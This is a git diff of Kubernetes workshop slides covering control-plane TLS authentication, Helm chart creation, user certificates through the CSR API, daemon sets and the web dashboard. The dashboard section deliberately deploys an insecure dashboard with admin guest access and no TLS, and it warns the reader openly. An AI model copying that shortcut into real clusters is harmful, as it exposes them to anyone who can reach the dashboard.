 ## Do we need to run Docker at all?

 No!
@@ -187,6 +199,8 @@ No!

 ---

+class: extra-details
+
 ## Do we need to run Docker at all?

 Yes!
@@ -209,6 +223,8 @@ Yes!

 ---

+class: extra-details
+
 ## Do we need to run Docker at all?

 - On our development environments, CI pipelines ... :
@@ -225,25 +241,21 @@ Yes!

 ---

-## Kubernetes resources
+## Interacting with Kubernetes

- The Kubernetes API defines a lot of objects called *resources*
+- We will interact with our Kubernetes cluster through the Kubernetes API

- These resources are organized by type, or `Kind` (in the API)
+- The Kubernetes API is (mostly) RESTful
+
+- It allows us to create, read, update, delete *resources*

 - A few common resource types are:

  - node (a machine — physical or virtual — in our cluster)
+
  - pod (group of containers running together on a node)
+
  - service (stable network endpoint to connect to one or multiple containers)
-  - namespace (more-or-less isolated group of things)
-  - secret (bundle of sensitive data to be passed to a container)
- 
-  And much more!
-
- We can see the full list by running `kubectl api-resources`
-
-  (In Kubernetes 1.10 and prior, the command to list API resources was `kubectl get`)

 ---

@@ -253,22 +265,16 @@ class: pic

 ---

-class: pic
-
-![One of the best Kubernetes architecture diagrams available](images/k8s-arch4-thanks-luxas.png)
-
---
-
 ## Credits

- The first diagram is courtesy of Weave Works
+- The first diagram is courtesy of Lucas Käldström, in [this presentation](https://speakerdeck.com/luxas/kubeadm-cluster-creation-internals-from-self-hosting-to-upgradability-and-ha)
+
+  - it's one of the best Kubernetes architecture diagrams available!
+
+- The second diagram is courtesy of Weave Works

  - a *pod* can have multiple containers working together

  - IP addresses are associated with *pods*, not with individual containers

- The second diagram is courtesy of Lucas Käldström, in [this presentation](https://speakerdeck.com/luxas/kubeadm-cluster-creation-internals-from-self-hosting-to-upgradability-and-ha)
-
-  - it's one of the best Kubernetes architecture diagrams available!
-
 Both diagrams used with permission.
--- a/slides/k8s/configuration.md
+++ b/slides/k8s/configuration.md
@@ -22,7 +22,7 @@

 - There are many ways to pass configuration to code running in a container:

-  - baking it in a custom image
+  - baking it into a custom image

  - command-line arguments

@@ -125,7 +125,7 @@

 - We can also use a mechanism called the *downward API*

- The downward API allows to expose pod or container information
+- The downward API allows exposing pod or container information

  - either through special files (we won't show that for now)

@@ -436,7 +436,7 @@ We should see connections served by Google, and others served by IBM.

 - We are going to store the port number in a configmap

- Then we will expose that configmap to a container environment variable
+- Then we will expose that configmap as a container environment variable

 ---

--- a/slides/k8s/control-plane-auth.md
+++ b/slides/k8s/control-plane-auth.md
@@ -0,0 +1,265 @@
+# Securing the control plane
+
+- Many components accept connections (and requests) from others:
+
+  - API server
+
+  - etcd
+
+  - kubelet
+
+- We must secure these connections:
+
+  - to deny unauthorized requests
+
+  - to prevent eavesdropping on secrets, tokens, and other sensitive information
+
+- Disabling authentication and/or authorization is **strongly discouraged**
+
+  (but it's possible to do it, e.g. for learning / troubleshooting purposes)
+
+---
+
+## Authentication and authorization
+
+- Authentication (checking "who you are") is done with mutual TLS
+
+  (both the client and the server need to hold a valid certificate)
+
+- Authorization (checking "what you can do") is done in different ways
+
+  - the API server implements a sophisticated permission logic (with RBAC)
+  
+  - some services will defer authorization to the API server (through webhooks)
+
+  - some services require a certificate signed by a particular CA / sub-CA
+
+---
+
+## In practice
+
+- We will review the various communication channels in the control plane
+
+- We will describe how they are secured
+
+- When TLS certificates are used, we will indicate:
+
+  - which CA signs them
+
+  - what their subject (CN) should be, when applicable
+
+- We will indicate how to configure security (client- and server-side)
+
+---
+
+## etcd peers
+
+- Replication and coordination of etcd happen on a dedicated port
+
+  (typically port 2380; the default port for normal client connections is 2379)
+
+- Authentication uses TLS certificates with a separate sub-CA
+
+  (otherwise, anyone with a Kubernetes client certificate could access etcd!)
+
+- The etcd command line flags involved are:
+
+   `--peer-client-cert-auth=true` to activate it
+
+   `--peer-cert-file`, `--peer-key-file`, `--peer-trusted-ca-file`
+
+---
+
+## etcd clients
+
+- The only¹ thing that connects to etcd is the API server
+
+- Authentication uses TLS certificates with a separate sub-CA
+
+  (for the same reasons as for etcd inter-peer authentication)
+
+- The etcd command line flags involved are:
+
+  `--client-cert-auth=true` to activate it
+
+  `--trusted-ca-file`, `--cert-file`, `--key-file`
+
+- The API server command line flags involved are:
+
+  `--etcd-cafile`, `--etcd-certfile`, `--etcd-keyfile`
+
+.footnote[¹Technically, there is also the etcd healthcheck. Let's ignore it for now.]
+
+---
+
+## API server clients
+
+- The API server has a sophisticated authentication and authorization system
+
+- For connections coming from other components of the control plane:
+
+  - authentication uses certificates (trusting the certificates' subject or CN)
+
+  - authorization uses whatever mechanism is enabled (most often, RBAC)
+
+- The relevant API server flags are:
+
+  `--client-ca-file`, `--tls-cert-file`, `--tls-private-key-file`
+
+- Each component connecting to the API server takes a `--kubeconfig` flag
+
+  (to specify a kubeconfig file containing the CA cert, client key, and client cert)
+
+- Yes, that kubeconfig file follows the same format as our `~/.kube/config` file!
+
+---
+
+## Kubelet and API server
+
+- Communication between kubelet and API server can be established both ways
+
+- Kubelet → API server:
+
+  - kubelet registers itself ("hi, I'm node42, do you have work for me?")
+
+  - connection is kept open and re-established if it breaks
+
+  - that's how the kubelet knows which pods to start/stop
+
+- API server → kubelet:
+
+  - used to retrieve logs, exec, attach to containers
+
+---
+
+## Kubelet → API server
+
+- Kubelet is started with `--kubeconfig` with API server information
+
+- The client certificate of the kubelet will typically have:
+
+  `CN=system:node:<nodename>` and groups `O=system:nodes`
+
+- Nothing special on the API server side
+
+  (it will authenticate like any other client)
+
+---
+
+## API server → kubelet
+
+- Kubelet is started with the flag `--client-ca-file`
+
+  (typically using the same CA as the API server)
+
+- API server will use a dedicated key pair when contacting kubelet
+
+  (specified with `--kubelet-client-certificate` and `--kubelet-client-key`)
+
+- Authorization uses webhooks
+
+  (enabled with `--authorization-mode=Webhook` on kubelet)
+
+- The webhook server is the API server itself
+
+  (the kubelet sends back a request to the API server to ask, "can this person do that?")
+
+---
+
+## Scheduler
+
+- The scheduler connects to the API server like an ordinary client
+
+- The certificate of the scheduler will have `CN=system:kube-scheduler`
+
+---
+
+## Controller manager
+
+- The controller manager is also a normal client to the API server
+
+- Its certificate will have `CN=system:kube-controller-manager`
+
+- If we use the CSR API, the controller manager needs the CA cert and key
+
+  (passed with flags `--cluster-signing-cert-file` and `--cluster-signing-key-file`)
+
+- We usually want the controller manager to generate tokens for service accounts
+
+- These tokens deserve some details (on the next slide!)
+
+---
+
+## Service account tokens
+
+- Each time we create a service account, the controller manager generates a token
+
+- These tokens are JWT tokens, signed with a particular key
+
+- These tokens are used for authentication with the API server
+
+  (and therefore, the API server needs to be able to verify their integrity)
+
+- This uses another keypair:
+
+  - the private key (used for signature) is passed to the controller manager
+    <br/>(using flags `--service-account-private-key-file` and `--root-ca-file`)
+
+  - the public key (used for verification) is passed to the API server
+    <br/>(using flag `--service-account-key-file`)
+
+---
+
+## kube-proxy
+
+- kube-proxy is "yet another API server client"
+
+- In many clusters, it runs as a Daemon Set
+
+- In that case, it will have its own Service Account and associated permissions
+
+- It will authenticate using the token of that Service Account
+
+---
+
+## Webhooks
+
+- We mentioned webhooks earlier; how does that really work?
+
+- The Kubernetes API has special resource types to check permissions
+
+- One of them is SubjectAccessReview
+
+- To check if a particular user can do a particular action on a particular resource:
+
+  - we prepare a SubjectAccessReview object
+
+  - we send that object to the API server
+
+  - the API server responds with allow/deny (and optional explanations)
+
+- Using webhooks for authorization = sending SAR to authorize each request
+
+---
+
+## Subject Access Review
+
+Here is an example showing how to check if `jean.doe` can `get` some `pods` in `kube-system`:
+
+```bash
+kubectl -v9 create -f- <<EOF
+apiVersion: authorization.k8s.io/v1beta1
+kind: SubjectAccessReview
+spec:
+  user: jean.doe
+  group:
+  - foo
+  - bar
+  resourceAttributes:
+    #group: blah.k8s.io
+    namespace: kube-system
+    resource: pods
+    verb: get
+    #name: web-xyz1234567-pqr89
+EOF
+```
--- a/slides/k8s/create-chart.md
+++ b/slides/k8s/create-chart.md
@@ -0,0 +1,114 @@
+## Creating a chart
+
+- We are going to show a way to create a *very simplified* chart
+
+- In a real chart, *lots of things* would be templatized
+
+  (Resource names, service types, number of replicas...)
+
+.exercise[
+
+- Create a sample chart:
+  ```bash
+  helm create dockercoins
+  ```
+
+- Move the sample templates out of the way and create an empty template directory:
+  ```bash
+  mv dockercoins/templates dockercoins/default-templates
+  mkdir dockercoins/templates
+  ```
+
+]
+
+---
+
+## Exporting the YAML for our application
+
+- The following section assumes that DockerCoins is currently running
+
+.exercise[
+
+- Create one YAML file for each resource that we need:
+  .small[
+  ```bash
+
+	while read kind name; do
+	  kubectl get -o yaml $kind $name > dockercoins/templates/$name-$kind.yaml
+	done <<EOF
+	deployment worker
+	deployment hasher
+	daemonset rng
+	deployment webui
+	deployment redis
+	service hasher
+	service rng
+	service webui
+	service redis
+	EOF
+  ```
+  ]
+
+]
+
+---
+
+## Testing our helm chart
+
+.exercise[
+
+- Let's install our helm chart! (`dockercoins` is the path to the chart)
+  ```
+  helm install dockercoins
+  ```
+]
+
+--
+
+- Since the application is already deployed, this will fail:<br>
+`Error: release loitering-otter failed: services "hasher" already exists`
+
+- To avoid naming conflicts, we will deploy the application in another *namespace*
+
+---
+
+## Switching to another namespace
+
+- We can create a new namespace and switch to it
+
+  (Helm will automatically use the namespace specified in our context)
+
+- We can also tell Helm which namespace to use
+
+.exercise[
+
+- Tell Helm to use a specific namespace:
+  ```bash
+  helm install dockercoins --namespace=magenta
+  ```
+
+]
+
+---
+
+## Checking our new copy of DockerCoins
+
+- We can check the worker logs, or the web UI
+
+.exercise[
+
+- Retrieve the NodePort number of the web UI:
+  ```bash
+  kubectl get service webui --namespace=magenta
+  ```
+
+- Open it in a web browser
+
+- Look at the worker logs:
+  ```bash
+  kubectl logs deploy/worker --tail=10 --follow --namespace=magenta
+  ```
+
+]
+
+Note: it might take a minute or two for the worker to start.
--- a/slides/k8s/create-more-charts.md
+++ b/slides/k8s/create-more-charts.md
@@ -0,0 +1,367 @@
+# Creating Helm charts
+
+- We are going to create a generic Helm chart
+
+- We will use that Helm chart to deploy DockerCoins
+
+- Each component of DockerCoins will have its own *release*
+
+- In other words, we will "install" that Helm chart multiple times
+
+  (one time per component of DockerCoins)
+
+---
+
+## Creating a generic chart
+
+- Rather than starting from scratch, we will use `helm create`
+
+- This will give us a basic chart that we will customize
+
+.exercise[
+
+- Create a basic chart:
+  ```bash
+  cd ~
+  helm create helmcoins
+  ```
+
+]
+
+This creates a basic chart in the directory `helmcoins`.
+
+---
+
+## What's in the basic chart?
+
+- The basic chart will create a Deployment and a Service
+
+- Optionally, it will also include an Ingress
+
+- If we don't pass any values, it will deploy the `nginx` image
+
+- We can override many things in that chart
+
+- Let's try to deploy DockerCoins components with that chart!
+
+---
+
+## Writing `values.yaml` for our components
+
+- We need to write one `values.yaml` file for each component
+
+  (hasher, redis, rng, webui, worker)
+
+- We will start with the `values.yaml` of the chart, and remove what we don't need
+
+- We will create 5 files:
+
+  hasher.yaml, redis.yaml, rng.yaml, webui.yaml, worker.yaml
+
+---
+
+## Getting started
+
+- For component X, we want to use the image dockercoins/X:v0.1
+
+  (for instance, for rng, we want to use the image dockercoins/rng:v0.1)
+
+- Exception: for redis, we want to use the official image redis:latest
+
+.exercise[
+
+- Write minimal YAML files for the 5 components, specifying only the image
+
+]
+
+--
+
+*Hint: our YAML files should look like this.*
+
+```yaml
+### rng.yaml
+image:
+  repository: dockercoins/`rng`
+  tag: v0.1
+```
+
+---
+
+## Deploying DockerCoins components
+
+- For convenience, let's work in a separate namespace
+
+.exercise[
+
+- Create a new namespace:
+  ```bash
+  kubectl create namespace helmcoins
+  ```
+
+- Switch to that namespace:
+  ```bash
+  kns helmcoins
+  ```
+
+]
+
+---
+
+## Deploying the chart
+
+- To install a chart, we can use the following command:
+  ```bash
+  helm install [--name `X`] <chart>
+  ```
+
+- We can also use the following command, which is idempotent:
+  ```bash
+  helm upgrade --install `X` chart
+  ```
+
+.exercise[
+
+- Install the 5 components of DockerCoins:
+  ```bash
+    for COMPONENT in hasher redis rng webui worker; do
+      helm upgrade --install $COMPONENT helmcoins/ --values=$COMPONENT.yaml
+    done
+  ```
+
+]
+
+---
+
+## Checking what we've done
+
+- Let's see if DockerCoins is working!
+
+.exercise[
+
+- Check the logs of the worker:
+  ```bash
+  stern worker
+  ```
+
+- Look at the resources that were created:
+  ```bash
+  kubectl get all
+  ```
+
+]
+
+There are *many* issues to fix!
+
+---
+
+## Service names
+
+- Our services should be named `rng`, `hasher`, etc., but they are named differently
+
+- Look at the YAML template used for the services
+
+- Does it look like we can override the name of the services?
+
+--
+
+- *Yes*, we can use `.Values.nameOverride`
+
+- This means setting `nameOverride` in the values YAML file
+
+---
+
+## Setting service names
+
+- Let's add `nameOverride: X` in each values YAML file!
+
+  (where X is hasher, redis, rng, etc.)
+
+.exercise[
+
+- Edit the 5 YAML files to add `nameOverride: X`
+
+- Deploy the updated Chart:
+  ```bash
+    for COMPONENT in hasher redis rng webui worker; do
+      helm upgrade --install $COMPONENT helmcoins/ --values=$COMPONENT.yaml
+    done
+  ```
+  (Yes, this is exactly the same command as before!)
+
+]
+
+---
+
+## Checking what we've done
+
+.exercise[
+
+- Check the service names:
+  ```bash
+  kubectl get services
+  ```
+  Great! (We have a useless service for `worker`, but let's ignore it for now.)
+
+- Check the state of the pods:
+  ```bash
+  kubectl get pods
+  ```
+  Not so great... Some pods are *not ready.*
+
+]
+
+---
+
+## Troubleshooting pods
+
+- The easiest way to troubleshoot pods is to look at *events*
+
+- We can look at all the events on the cluster (with `kubectl get events`)
+
+- Or we can use `kubectl describe` on the objects that have problems
+
+  (`kubectl describe` will retrieve the events related to the object)
+
+.exercise[
+
+- Check the events for the redis pods:
+  ```bash
+  kubectl describe pod -l app.kubernetes.io/name=redis
+  ```
+
+]
+
+What's going on?
+
+---
+
+## Healthchecks
+
+- The default chart defines healthchecks doing HTTP requests on port 80
+
+- That won't work for redis and worker
+
+  (redis is not HTTP, and not on port 80; worker doesn't even listen)
+
+--
+
+- We could comment out the healthchecks
+
+- We could also make them conditional
+
+- This sounds more interesting, let's do that!
+
+---
+
+## Conditionals
+
+- We need to enclose the healthcheck block with:
+
+  `{{ if CONDITION }}` at the beginning
+
+  `{{ end }}` at the end
+
+- For the condition, we will use `.Values.healthcheck`
+
+---
+
+## Updating the deployment template
+
+.exercise[
+
+- Edit `helmcoins/templates/deployment.yaml`
+
+- Before the healthchecks section (it starts with `livenessProbe:`), add:
+
+  `{{ if .Values.healthcheck }}`
+
+- After the healthchecks section (just before `resources:`), add:
+
+  `{{ end }}`
+
+- Edit `hasher.yaml`, `rng.yaml`, `webui.yaml` to add:
+
+  `healthcheck: true`
+
+]
+
+---
+
+## Update the deployed charts
+
+- We can now apply the new templates (and the new values)
+
+.exercise[
+
+- Use the same command as earlier to upgrade all five components
+
+- Use `kubectl describe` to confirm that `redis` starts correctly
+
+- Use `kubectl describe` to confirm that `hasher` still has healthchecks
+
+]
+
+---
+
+## Is it working now?
+
+- If we look at the worker logs, it appears that the worker is still stuck
+
+- What could be happening?
+
+--
+
+- The redis service is not on port 80!
+
+- We need to update the port number in redis.yaml
+
+- We also need to update the port number in deployment.yaml
+
+  (it is hard-coded to 80 there)
+
+---
+
+## Setting the redis port
+
+.exercise[
+
+- Edit `redis.yaml` to add:
+  ```yaml
+    service:
+      port: 6379
+  ```
+
+- Edit `helmcoins/templates/deployment.yaml`
+
+- The line with `containerPort` should be:
+  ```yaml
+  containerPort: {{ .Values.service.port }}
+  ```
+
+]
+
+---
+
+## Apply changes
+
+- Re-run the for loop to execute `helm upgrade` one more time
+
+- Check the worker logs
+
+- This time, it should be working!
+
+---
+
+## Extra steps
+
+- We don't need to create a service for the worker
+
+- We can put the whole service block in a conditional
+
+  (this will require additional changes in other files referencing the service)
+
+- We can set the webui to be a NodePort service
+
+- We can change the number of workers with `replicaCount`
+
+- And much more!
--- a/slides/k8s/csr-api.md
+++ b/slides/k8s/csr-api.md
@@ -0,0 +1,426 @@
+# The CSR API
+
+- The Kubernetes API exposes CSR resources
+
+- We can use these resources to issue TLS certificates
+
+- First, we will go through a quick reminder about TLS certificates
+
+- Then, we will see how to obtain a certificate for a user
+
+- We will use that certificate to authenticate with the cluster
+
+- Finally, we will grant some privileges to that user
+
+---
+
+## Reminder about TLS
+
+- TLS (Transport Layer Security) is a protocol providing:
+
+  - encryption (to prevent eavesdropping)
+
+  - authentication (using public key cryptography)
+
+- When we access an https:// URL, the server authenticates itself
+
+  (it proves its identity to us; as if it were "showing its ID")
+
+- But we can also have mutual TLS authentication (mTLS)
+
+  (client proves its identity to server; server proves its identity to client)
+
+---
+
+## Authentication with certificates
+
+- To authenticate, someone (client or server) needs:
+
+  - a *private key* (that remains known only to them)
+
+  - a *public key* (that they can distribute)
+
+  - a *certificate* (associating the public key with an identity)
+
+- A message encrypted with the private key can only be decrypted with the public key
+
+  (and vice versa)
+
+- If I use someone's public key to encrypt/decrypt their messages,
+  <br/>
+  I can be certain that I am talking to them / they are talking to me
+
+- The certificate proves that I have the correct public key for them
+
+---
+
+## Certificate generation workflow
+
+This is what I do if I want to obtain a certificate.
+
+1. Create public and private keys.
+
+2. Create a Certificate Signing Request (CSR).
+
+   (The CSR contains the identity that I claim and a public key.)
+
+3. Send that CSR to the Certificate Authority (CA).
+
+4. The CA verifies that I can claim the identity in the CSR.
+
+5. The CA generates my certificate and gives it to me.
+
+The CA (or anyone else) never needs to know my private key.
+
+---
+
+## The CSR API
+
+- The Kubernetes API has a CertificateSigningRequest resource type
+
+  (we can list them with e.g. `kubectl get csr`)
+
+- We can create a CSR object
+
+  (= upload a CSR to the Kubernetes API)
+
+- Then, using the Kubernetes API, we can approve/deny the request
+
+- If we approve the request, the Kubernetes API generates a certificate
+
+- The certificate gets attached to the CSR object and can be retrieved
+
+---
+
+## Using the CSR API
+
+- We will show how to use the CSR API to obtain user certificates
+
+- This will be a rather complex demo
+
+- ... And yet, we will take a few shortcuts to simplify it
+
+  (but it will illustrate the general idea)
+
+- The demo also won't be automated
+
+  (we would have to write extra code to make it fully functional)
+
+---
+
+## General idea
+
+- We will create a Namespace named "users"
+
+- Each user will get a ServiceAccount in that Namespace
+
+- That ServiceAccount will give read/write access to *one* CSR object
+
+- Users will use that ServiceAccount's token to submit a CSR
+
+- We will approve the CSR (or not)
+
+- Users can then retrieve their certificate from their CSR object
+
+- ...And use that certificate for subsequent interactions
+
+---
+
+## Resource naming
+
+For a user named `jean.doe`, we will have:
+
+- ServiceAccount `jean.doe` in Namespace `users`
+
+- CertificateSigningRequest `users:jean.doe`
+
+- ClusterRole `users:jean.doe` giving read/write access to that CSR
+
+- ClusterRoleBinding `users:jean.doe` binding ClusterRole and ServiceAccount
+
+---
+
+## Creating the user's resources
+
+.warning[If you want to use a name other than `jean.doe`, update the YAML file!]
+
+.exercise[
+
+- Create the global namespace for all users:
+  ```bash
+  kubectl create namespace users
+  ```
+
+- Create the ServiceAccount, ClusterRole, ClusterRoleBinding for `jean.doe`:
+  ```bash
+  kubectl apply -f ~/container.training/k8s/users:jean.doe.yaml
+  ```
+
+]
+
+---
+
+## Extracting the user's token
+
+- Let's obtain the user's token and give it to them
+
+  (the token will be their password)
+
+.exercise[
+
+- List the user's secrets:
+  ```bash
+  kubectl --namespace=users describe serviceaccount jean.doe
+  ```
+
+- Show the user's token:
+  ```bash
+  kubectl --namespace=users describe secret `jean.doe-token-xxxxx`
+  ```
+
+]
+
+---
+
+## Configure `kubectl` to use the token
+
+- Let's create a new context that will use that token to access the API
+
+.exercise[
+
+- Add a new identity to our kubeconfig file:
+  ```bash
+  kubectl config set-credentials token:jean.doe --token=...
+  ```
+
+- Add a new context using that identity:
+  ```bash
+  kubectl config set-context jean.doe --user=token:jean.doe --cluster=kubernetes
+  ```
+
+]
+
+---
+
+## Access the API with the token
+
+- Let's switch to the new context (e.g. with `kctx jean.doe`) and check that our access rights are set properly
+
+.exercise[
+
+- Try to access any resource:
+  ```bash
+  kubectl get pods
+  ```
+  (This should tell us "Forbidden")
+
+- Try to access "our" CertificateSigningRequest:
+  ```bash
+  kubectl get csr users:jean.doe
+  ```
+  (This should tell us "NotFound")
+
+]
+
+---
+
+## Create a key and a CSR
+
+- There are many tools to generate TLS keys and CSRs
+
+- Let's use OpenSSL; it's not the best one, but it's installed everywhere
+
+  (many people prefer cfssl, easyrsa, or other tools; that's fine too!)
+
+.exercise[
+
+- Generate the key and certificate signing request:
+  ```bash
+    openssl req -newkey rsa:2048 -nodes -keyout key.pem \
+                -new -subj /CN=jean.doe/O=devs/ -out csr.pem
+  ```
+
+]
+
+The command above generates:
+
+- a 2048-bit RSA key, without encryption, stored in key.pem
+- a CSR for the name `jean.doe` in group `devs`
+
+---
+
+## Inside the Kubernetes CSR object
+
+- The Kubernetes CSR object is a thin wrapper around the CSR PEM file
+
+- The PEM file needs to be encoded to base64 on a single line
+
+  (we will use `base64 -w0` for that purpose)
+
+- The Kubernetes CSR object also needs to list the right "usages"
+
+  (these are flags indicating how the certificate can be used)
+
+---
+
+## Sending the CSR to Kubernetes
+
+.exercise[
+
+- Generate and create the CSR resource:
+  ```bash
+    kubectl apply -f - <<EOF
+    apiVersion: certificates.k8s.io/v1beta1
+    kind: CertificateSigningRequest
+    metadata:
+      name: users:jean.doe
+    spec:
+      request: $(base64 -w0 < csr.pem)
+      usages:
+      - digital signature
+      - key encipherment
+      - client auth
+    EOF
+  ```
+
+]
+
+---
+
+## Adjusting certificate expiration
+
+- By default, the CSR API generates certificates valid for 1 year
+
+- We want to generate short-lived certificates, so we will lower that to 1 hour
+
+- For now, this is configured [through an experimental controller manager flag](https://github.com/kubernetes/kubernetes/issues/67324)
+
+.exercise[
+
+- Edit the static pod definition for the controller manager:
+  ```bash
+  sudo vim /etc/kubernetes/manifests/kube-controller-manager.yaml
+  ```
+
+- In the list of flags, add the following line:
+  ```bash
+  - --experimental-cluster-signing-duration=1h
+  ```
+
+]
+
+---
+
+## Verifying and approving the CSR
+
+- Let's inspect the CSR, and if it is valid, approve it
+
+.exercise[
+
+- Switch back to `cluster-admin`:
+  ```bash
+  kctx -
+  ```
+
+- Inspect the CSR:
+  ```bash
+  kubectl describe csr users:jean.doe
+  ```
+
+- Approve it:
+  ```bash
+  kubectl certificate approve users:jean.doe
+  ```
+
+]
+
+---
+
+## Obtaining the certificate
+
+.exercise[
+
+- Switch back to the user's identity:
+  ```bash
+  kctx -
+  ```
+
+- Retrieve the updated CSR object and extract the certificate:
+  ```bash
+  kubectl get csr users:jean.doe \
+          -o jsonpath={.status.certificate} \
+          | base64 -d > cert.pem
+  ```
+
+- Inspect the certificate:
+  ```bash
+  openssl x509 -in cert.pem -text -noout
+  ```
+
+]
+
+---
+
+## Using the certificate
+
+.exercise[
+
+- Add the key and certificate to kubeconfig:
+  ```bash
+  kubectl config set-credentials cert:jean.doe --embed-certs \
+          --client-certificate=cert.pem --client-key=key.pem
+  ```
+
+- Update the user's context to use the key and cert to authenticate:
+  ```bash
+  kubectl config set-context jean.doe --user cert:jean.doe
+  ```
+
+- Confirm that we are seen as `jean.doe` (but don't have permissions):
+  ```bash
+  kubectl get pods
+  ```
+
+]
+
+---
+
+## What's missing?
+
+We have just shown, step by step, a method to issue short-lived certificates for users.
+
+To be usable in real environments, we would need to add:
+
+- a kubectl helper to automatically generate the CSR and obtain the cert
+
+  (and transparently renew the cert when needed)
+
+- a Kubernetes controller to automatically validate and approve CSRs
+
+  (checking that the subject and groups are valid)
+
+- a way for the users to know the groups to add to their CSR
+
+  (e.g.: annotations on their ServiceAccount + read access to the ServiceAccount)
+
+---
+
+## Is this realistic?
+
+- Larger organizations typically integrate with their own directory
+
+- The general principle, however, is the same:
+
+  - users have long-term credentials (password, token, ...)
+
+  - they use these credentials to obtain other, short-lived credentials
+
+- This provides enhanced security:
+
+  - the long-term credentials can use long passphrases, 2FA, HSM...
+
+  - the short-term credentials are more convenient to use
+
+  - we get strong security *and* convenience
+
+- Systems like Vault also have certificate issuance mechanisms
--- a/slides/k8s/daemonset.md
+++ b/slides/k8s/daemonset.md
@@ -4,15 +4,29 @@

 - We want one (and exactly one) instance of `rng` per node

- What if we just scale up `deploy/rng` to the number of nodes?
+- We *do not want* two instances of `rng` on the same node

-  - nothing guarantees that the `rng` containers will be distributed evenly
+- We will do that with a *daemon set*

-  - if we add nodes later, they will not automatically run a copy of `rng`
+---

-  - if we remove (or reboot) a node, one `rng` container will restart elsewhere
+## Why not a deployment?

- Instead of a `deployment`, we will use a `daemonset`
+- Can't we just do `kubectl scale deployment rng --replicas=...`?
+
+--
+
+- Nothing guarantees that the `rng` containers will be distributed evenly
+
+- If we add nodes later, they will not automatically run a copy of `rng`
+
+- If we remove (or reboot) a node, one `rng` container will restart elsewhere
+
+  (and we will end up with two instances of `rng` on the same node)
+
+- By contrast, a daemon set will start one pod per node and keep it that way
+
+  (as nodes are added or removed)

 ---

@@ -38,7 +52,7 @@

 <!-- ##VERSION## -->

- Unfortunately, as of Kubernetes 1.14, the CLI cannot create daemon sets
+- Unfortunately, as of Kubernetes 1.15, the CLI cannot create daemon sets

 --

@@ -73,18 +87,13 @@

 - Dump the `rng` resource in YAML:
  ```bash
-  kubectl get deploy/rng -o yaml --export >rng.yml 
+  kubectl get deploy/rng -o yaml >rng.yml
  ```

 - Edit `rng.yml`

 ]

-Note: `--export` will remove "cluster-specific" information, i.e.:
- namespace (so that the resource is not tied to a specific namespace)
- status and creation timestamp (useless when creating a new resource)
- resourceVersion and uid (these would cause... *interesting* problems)
-
 ---

 ## "Casting" a resource to another
@@ -376,7 +385,7 @@ But ... why do these pods (in particular, the *new* ones) have this `app=rng` la

 - Bottom line: if we remove our `app=rng` label ...

- ... The pod "diseappears" for its parent, which re-creates another pod to replace it
+ ... The pod "disappears" for its parent, which re-creates another pod to replace it

 ---

--- a/slides/k8s/dashboard.md
+++ b/slides/k8s/dashboard.md
@@ -2,88 +2,60 @@

 - Kubernetes resources can also be viewed with a web dashboard

- We are going to deploy that dashboard with *three commands:*
+- That dashboard is usually exposed over HTTPS

-  1) actually *run* the dashboard
+  (this requires obtaining a proper TLS certificate)

-  2) bypass SSL for the dashboard
+- Dashboard users need to authenticate

-  3) bypass authentication for the dashboard
+- We are going to take a *dangerous* shortcut

--
+---

-There is an additional step to make the dashboard available from outside (we'll get to that)
+## The insecure method

--
+- We could (and should) use [Let's Encrypt](https://letsencrypt.org/) ...
+
+- ... but we don't want to deal with TLS certificates
+
+- We could (and should) learn how authentication and authorization work ...
+
+- ... but we will use a guest account with admin access instead

 .footnote[.warning[Yes, this will open our cluster to all kinds of shenanigans. Don't do this at home.]]

 ---

-## 1) Running the dashboard
+## Running a very insecure dashboard

- We need to create a *deployment* and a *service* for the dashboard
+- We are going to deploy that dashboard with *one single command*

- But also a *secret*, a *service account*, a *role* and a *role binding*
+- This command will create all the necessary resources

- All these things can be defined in a YAML file and created with `kubectl apply -f`
+  (the dashboard itself, the HTTP wrapper, the admin/guest account)
+
+- All these resources are defined in a YAML file
+
+- All we have to do is load that YAML file with `kubectl apply -f`

 .exercise[

 - Create all the dashboard resources, with the following command:
  ```bash
-  kubectl apply -f ~/container.training/k8s/kubernetes-dashboard.yaml
+  kubectl apply -f ~/container.training/k8s/insecure-dashboard.yaml
  ```

 ]

 ---

-
-## 2) Bypassing SSL for the dashboard
-
- The Kubernetes dashboard uses HTTPS, but we don't have a certificate
-
- Recent versions of Chrome (63 and later) and Edge will refuse to connect
-
-  (You won't even get the option to ignore a security warning!)
-
- We could (and should!) get a certificate, e.g. with [Let's Encrypt](https://letsencrypt.org/)
-
- ... But for convenience, for this workshop, we'll forward HTTP to HTTPS
-
-.warning[Do not do this at home, or even worse, at work!]
-
---
-
-## Running the SSL unwrapper
-
- We are going to run [`socat`](http://www.dest-unreach.org/socat/doc/socat.html), telling it to accept TCP connections and relay them over SSL
-
- Then we will expose that `socat` instance with a `NodePort` service
-
- For convenience, these steps are neatly encapsulated into another YAML file
-
-.exercise[
-
- Apply the convenient YAML file, and defeat SSL protection:
-  ```bash
-  kubectl apply -f ~/container.training/k8s/socat.yaml
-  ```
-
-]
-
-.warning[All our dashboard traffic is now clear-text, including passwords!]
-
---
-
 ## Connecting to the dashboard

 .exercise[

 - Check which port the dashboard is on:
  ```bash
-  kubectl -n kube-system get svc socat
+  kubectl get svc dashboard
  ```

 ]
@@ -113,26 +85,7 @@ The dashboard will then ask you which authentication you want to use.

  - "skip" (use the dashboard "service account")

- Let's use "skip": we get a bunch of warnings and don't see much
-
---
-
-## 3) Bypass authentication for the dashboard
-
- The dashboard documentation [explains how to do this](https://github.com/kubernetes/dashboard/wiki/Access-control#admin-privileges)
-
- We just need to load another YAML file!
-
-.exercise[
-
- Grant admin privileges to the dashboard so we can see our resources:
-  ```bash
-  kubectl apply -f ~/container.training/k8s/grant-admin-to-dashboard.yaml
-  ```
-
- Reload the dashboard and enjoy!
-
-]
+- Let's use "skip": we're logged in!

 --

@@ -140,68 +93,6 @@ The dashboard will then ask you which authentication you want to use.

 ---

-## Exposing the dashboard over HTTPS
-
- We took a shortcut by forwarding HTTP to HTTPS inside the cluster
-
- Let's expose the dashboard over HTTPS!
-
- The dashboard is exposed through a `ClusterIP` service (internal traffic only)
-
- We will change that into a `NodePort` service (accepting outside traffic)
-
-.exercise[
-
- Edit the service:
-  ```
-  kubectl edit service kubernetes-dashboard
-  ```
-
-]
-
--
-
-`NotFound`?!? Y U NO WORK?!?
-
---
-
-## Editing the `kubernetes-dashboard` service
-
- If we look at the [YAML](https://github.com/jpetazzo/container.training/blob/master/k8s/kubernetes-dashboard.yaml) that we loaded before, we'll get a hint
-
--
-
- The dashboard was created in the `kube-system` namespace
-
--
-
-.exercise[
-
- Edit the service:
-  ```bash
